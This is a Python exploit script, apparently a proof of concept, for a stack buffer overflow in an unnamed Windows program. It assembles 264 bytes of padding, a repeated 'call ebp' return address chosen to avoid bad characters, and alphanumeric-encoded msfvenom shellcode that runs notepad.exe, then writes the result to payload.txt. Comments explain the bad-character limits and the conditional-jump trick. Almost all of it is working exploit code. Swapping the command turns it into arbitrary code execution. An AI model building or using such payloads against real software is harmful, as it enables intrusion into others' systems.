# Enes Şakir ÇOLAK - ZAYOTEM
#
# Need the address of a "call ebp" instruction (opcode bytes ff d5; search the
# binary for them), but don't forget that none of this address's bytes can be
# in the range 0x00-0x20.
# Also check the last dword of the jump block: that value has to be a valid
# address, and the dword 8 bytes before that address has to be negative, so
# that "dec ecx" sets SF and the following JL is taken.

# 0x00 - 0x20 are bad characters
padding = 264 * b"A"

# CALL EBP: the saved return address is overwritten with this value
jmp = 7 * b"\x9A\x47\xCF\x75"
# jmp's last dword value is an address and it has to be checked:
# if dword[address-8] is negative according to the calculation, it is okay [dec ecx].
# Set a breakpoint to see this function -> offset 0x3994 [dec ecx -> 0x39A3]

# buf = msfvenom -p windows/exec cmd=notepad.exe -f c -e x86/alpha_mixed
buf = b""
buf += b"\x89\xe1\xda\xd8\xd9\x71\xf4\x5d\x55\x59\x49\x49\x49"
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x7a\x48\x4c"
buf += b"\x42\x57\x70\x33\x30\x67\x70\x43\x50\x6e\x69\x4a\x45"
buf += b"\x76\x51\x79\x50\x42\x44\x6e\x6b\x66\x30\x64\x70\x4c"
buf += b"\x4b\x36\x32\x46\x6c\x4e\x6b\x61\x42\x57\x64\x6e\x6b"
buf += b"\x32\x52\x35\x78\x34\x4f\x4f\x47\x62\x6a\x66\x46\x46"
buf += b"\x51\x49\x6f\x4e\x4c\x75\x6c\x63\x51\x43\x4c\x63\x32"
buf += b"\x34\x6c\x77\x50\x6a\x61\x78\x4f\x64\x4d\x53\x31\x68"
buf += b"\x47\x38\x62\x6a\x52\x76\x32\x61\x47\x4e\x6b\x72\x72"
buf += b"\x34\x50\x4e\x6b\x72\x6a\x65\x6c\x4e\x6b\x62\x6c\x67"
buf += b"\x61\x62\x58\x7a\x43\x77\x38\x47\x71\x6e\x31\x62\x71"
buf += b"\x4e\x6b\x30\x59\x57\x50\x56\x61\x78\x53\x4c\x4b\x63"
buf += b"\x79\x36\x78\x49\x73\x65\x6a\x42\x69\x6e\x6b\x76\x54"
buf += b"\x6c\x4b\x66\x61\x7a\x76\x45\x61\x4b\x4f\x4e\x4c\x5a"
buf += b"\x61\x68\x4f\x56\x6d\x46\x61\x6f\x37\x47\x48\x49\x70"
buf += b"\x74\x35\x68\x76\x55\x53\x61\x6d\x7a\x58\x55\x6b\x61"
buf += b"\x6d\x74\x64\x50\x75\x69\x74\x51\x48\x6e\x6b\x61\x48"
buf += b"\x56\x44\x63\x31\x38\x53\x75\x36\x4c\x4b\x64\x4c\x70"
buf += b"\x4b\x4e\x6b\x46\x38\x67\x6c\x57\x71\x58\x53\x4c\x4b"
buf += b"\x36\x64\x4e\x6b\x53\x31\x38\x50\x4f\x79\x77\x34\x65"
buf += b"\x74\x65\x74\x43\x6b\x71\x4b\x73\x51\x70\x59\x72\x7a"
buf += b"\x30\x51\x69\x6f\x69\x70\x61\x4f\x63\x6f\x52\x7a\x4c"
buf += b"\x4b\x36\x72\x38\x6b\x6c\x4d\x61\x4d\x70\x6a\x55\x51"
buf += b"\x6e\x6d\x6b\x35\x4d\x62\x65\x50\x47\x70\x73\x30\x66"
buf += b"\x30\x70\x68\x74\x71\x6c\x4b\x70\x6f\x4f\x77\x49\x6f"
buf += b"\x58\x55\x4d\x6b\x4a\x50\x4e\x55\x4e\x42\x56\x36\x42"
buf += b"\x48\x4d\x76\x6f\x65\x4f\x4d\x4d\x4d\x39\x6f\x58\x55"
buf += b"\x47\x4c\x36\x66\x63\x4c\x77\x7a\x6f\x70\x49\x6b\x79"
buf += b"\x70\x72\x55\x57\x75\x6d\x6b\x50\x47\x75\x43\x74\x32"
buf += b"\x62\x4f\x53\x5a\x53\x30\x71\x43\x79\x6f\x58\x55\x30"
buf += b"\x6e\x72\x4f\x30\x74\x53\x55\x34\x30\x31\x71\x62\x44"
buf += b"\x54\x6e\x32\x45\x70\x78\x71\x75\x75\x50\x41\x41"

# Write the assembled payload: padding, then the CALL EBP addresses, then the shellcode
with open("payload.txt", "wb") as f:
    f.write(padding + jmp + buf)